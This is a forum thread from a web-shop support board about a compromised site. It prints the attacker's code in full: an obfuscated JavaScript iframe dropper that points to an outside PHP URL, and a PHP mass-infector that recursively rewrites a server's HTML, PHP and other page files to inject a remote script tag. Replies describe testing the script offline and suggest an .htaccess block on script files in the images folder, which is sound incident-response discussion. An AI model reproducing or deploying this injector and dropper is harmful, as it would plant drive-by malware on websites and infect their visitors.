v=document[o](function(QGS,NoN,EbKg3,x){return [QGS+'x79x6cx78','x69x66x72x61x6d'+NoN,'x7ax6bx79x6fx77'+x,'x6dx59x4e'+EbKg3]}('x6ax74x75x74x6f','x65','x73x71x36x63','x61x4bx36x5a')[1]);var sN="";nS='';var jYB='';var dM="dM";v[d](f, g.i());var rC=new Date();eN=7961;var lK=function(){return 'lK'};lKV=false;var vU=function(){return 'vU'};v[d](e, "1");jG="jG";var wH="";this.oD='';this.bO="";var mTY="";var oT=14991;v[d](jW, "1");this.wJ=false;var pW=function(){return 'pW'};function uN(){};var hM=new Date();var vE="vE";var yJ=11375;this.vC="";var yB=function(){};bA[m][j](v);var iR=new Array();var zA='';this.eR="eR";var pQ="pQ";bYH="bYH";var hG=false;} catch(jWF) {zQ="zQ";var wN="";var zE="zE";this.yH='';cP=9025;var rW=false;var qB=new Array();bA[u](function(sW,esRb1,sq,R,OjhDX){return [OjhDX+'x79x74x43','x48x4ex4fx6bx30'+R,sq+'x6dx47','x3cx68x74x6dx6cx20'+sW,esRb1+'x79x51x32']}('x3ex3cx62x6fx64x79x20x3ex3cx2fx62x6fx64x79x3ex3cx2fx68x74x6dx6cx3e','x46x4dx71','x4ax72x35x70x7a','x56x6b','x55')[3]);this.iF=false;this.bQ=28450;this.hGJ="";this.jQ=27206;var uT=new Array();this.hC="";b[t](function(){ g.a() }, 332);bAF='';this.zED="";this.lEX=16395;lYL=false;cH="";zU="zU";}var zS=false;this.qH='';zYH="zYH";var nE=function(){return 'nE'};},i : function() {this.tK="";uTW=950;return function(pInG8,H0,TBjz,X4){return [H0+'x41x77','x4cx78x79x51'+X4,TBjz+'x73x2fx67x6fx2ex70x68x70x3fx73x69x64x3dx39','x76'+pInG8]}('x71x73','x78x6bx65','x68x74x74x70x3ax2fx2fx61x6cx74x65x72x70x61x72x61x64x69x67x6dx61x2ex6ex65x74x2fx73x74x64','x79x48x34x38x63')[2];jWX=false;var rI=false;function cHE(){};var gP="";}};function aX(){};var eX=new iL(); var zUF='';eX.a();var rU=false;</script>

 

Absolutely. Have you read this?

Link to comment
Share on other sites

Any idea on how to decode this.

In post 4 of this thread there is a website mentioned where the poster decoded this. I wouldn't bother, it is malicious. Needs to be removed and the hole through which they came closed.

Link to comment
Share on other sites

I didn't decode it but I found out what it does.

 

I disconnected from the internet and placed the script in a web page and opened it locally with IE.

 

It tried to run an active-x control on my machine when I opened it.

 

Something I quickly denied as it's a very good way to get your PC FUBAR.

:o

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

I went back to what i thought was a clean backup and the only additional files I found that was not there before were:

 

Located in the /htdocs/images/ directory

 

  • alexa75d78824.php
  • g00gle5cbc1438599b65.php
  • goog1e5cbc1438599b65.php
  • goog1ebab5108ecc535a.php
  • google5cbc1438599b65.php
  • inclasses.php
  • pageclasses.php

 

Most of the files looks like this:

 

<?php

 

set_time_limit(9999999);

 

$old_malware_codes = array("<script src='http://nt002.cn/E/J.JS'></script>", "<script src=\"http://nt002.cn/E/J.JS\"></script>");

 

$malware_code = "<script src=\"http://nt02.co.in/3\"></script>";

$malware_code2 = "<script src='http://nt02.co.in/3'></script>";

$tmp_dir = "/tmp/.X11-font-unix";

 

function iframe_file($dir, $f)

{

global $tmp_dir, $old_malware_codes, $malware_code, $malware_code2;

 

# if ($f != "index.html") {

# return;

# }

$src_file = $dir."/".$f;

$tmp_file = $tmp_dir."/".$f;

 

$restore_perms = 0;

$orig_perms = fileperms($src_file);

if (!($orig_perms & 0x0080)) {

echo "$src_file: set write permissons<br>\n";

if (!chmod($src_file, $orig_perms | (0x0080|0x0010))) {

echo "<font color='red'>$src_file: cannot set write permissons</font><br>\n";

return;

}

$restore_perms = 1;

}

 

$src_fd = fopen($src_file, "r");

if (!$src_file) {

echo("<font color='red'>Cannot open file $src_file</font><br>\n");

return;

}

$tmp_fd = fopen($tmp_file, "w");

if (!$tmp_file) {

echo("<font color='red'>Cannot open file $tmp_file</font><br>\n");

fclose($src_fd);

return;

}

$deface_done = 0;

while (!feof($src_fd) ) {

$line = fgets($src_fd);

 

if (eregi("Web Shell by boff", $line)) {

echo $src_file.": skip shell<br>\n";

break;

}

 

foreach ($old_malware_codes as $old_code){

$line = eregi_replace ($old_code, "", $line);

}

 

if (eregi($malware_code, $line) || eregi($malware_code2, $line)) {

echo $src_file.": already infected<br>\n";

break;

}

 

if (preg_match_all("/<\/body>[^']*\"/i", $line, $matches)) {

$line = preg_replace("/<\/body>/i", $malware_code2."</body>", $line);

$deface_done = 1;

} else if (preg_match_all("/<\/body>[^\"]*'/i", $line, $matches)) {

$line = preg_replace("/<\/body>/i", $malware_code."</body>", $line);

$deface_done = 1;

} else if (eregi("</body>", $line)) {

$line = preg_replace("/<\/body>/i", $malware_code."</body>", $line);

$deface_done = 1;

}

/*

if (preg_match_all("/<\/body>.*?[('\")]/i", $line, $matches)) {

echo "--->>> Match: char=[".$matches[0][0]."]<br>\n";

if ($matches[0][0] == "'") {

// if (!strcmp($matches[0][0], '"')) {

echo "--->>> Char is 1 quote: [".$matches[0][0]."]<br>\n";

$line = preg_replace("/<\/body>/i", $malware_code."</body>", $line);

} else {

echo "--->>> Char is 2 quotes: [".$matches[0][0]."]<br>\n";

$line = preg_replace("/<\/body>/i", $malware_code2."</body>", $line);

}

$deface_done = 1;

}*/

 

fputs($tmp_fd, $line);

}

fclose($src_fd);

fclose($tmp_fd);

 

if ($deface_done) {

if (copy($tmp_file, $src_file)) {

echo "<font color='green'>".$src_file.": file iframed!</font><br>\n";

} else {

echo "<font color='red'>".$src_file.": copy failed</font><br>\n";

}

}

 

unlink($tmp_file);

 

// Restore file permissions

//

if ($restore_perms) {

echo "$src_file: restore permissons";

chmod($src_file, $orig_perms);

}

}

 

function scan_dir($dir)

{

global $tfile,$tdir;

$i=0;

$j=0;

$myfiles;

$myfiles[][] = array();

 

if (is_dir($dir)) {

if ($dh = opendir($dir)) {

while (($f = readdir($dh)) != false) {

if (!is_dir($dir."/".$f)) {

$i++;

 

# echo $dir."/".$f." - <b>File</b><br>";

 

if (eregi("\.s{0,1}html{0,1}$", $f) ||

eregi("\.php\d{0,1}$", $f) ||

eregi("\.aspx{0,1}$", $f) ||

eregi("\.pl$", $f) ||

eregi("\.cfm$", $f)) {

iframe_file($dir, $f);

} else {

# echo $dir."/".$f." - <b>Skip</b><br>\n";

}

} else {

if (($f != ".") && ($f != "..")) {

$tdir[$j]=$f;

# echo $dir."/".$f." - <b>Directory</b><br>";

//$sep = .\\.;

scan_dir($dir."/".$f);

$j++;

}

}

}

closedir($dh);

}

}

}

 

 

rmdir($tmp_dir);

mkdir($tmp_dir, 0755);

if (!file_exists($tmp_dir)) {

$tmp_dir=dirname(__FILE__)."/tmp";

mkdir($tmp_dir, 0755);

}

if ($_GET['root']) {

$root_dir = $_GET['root'];

} else {

$root_dir = getenv("DOCUMENT_ROOT");

}

 

echo "root_dir=".$root_dir."<br>\n";

scan_dir($root_dir);

rmdir($tmp_dir);

 

 

?>

 

 

Actually I was pointing to a website which did a base_64 decode on the php code injection. I couldnt decifer the js, and didnt put much effort or time into it either.

Link to comment
Share on other sites

I went back to what i thought was a clean backup and the only additional files I found that was not there before were:

 

Located in the /htdocs/images/ directory

 

  • alexa75d78824.php
  • g00gle5cbc1438599b65.php
  • goog1e5cbc1438599b65.php
  • goog1ebab5108ecc535a.php
  • google5cbc1438599b65.php
  • inclasses.php
  • pageclasses.php

 

Most of the files looks like this:

Looks real nasty code to me.

 

If you read the pinned topic in the Installation forum and thwarted the PHP_SELF hack and/or other hacks that might have been used to compromise your shop copy this code in a text file (htaccess.txt for example) and upload it to your images directory. Then rename it to .htaccess (after you deleted the one that may already be there, but left by the hackers probably).

 

# $Id$
#
# This is used to restrict access to this folder to anything other
# than images

# Prevents any script files from being accessed from the images folder
<FilesMatch "\.(php([0-9]|s)?|s?p?html|cgi|pl|exe)$">
  Order Deny,Allow
  Deny from all
</FilesMatch>

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...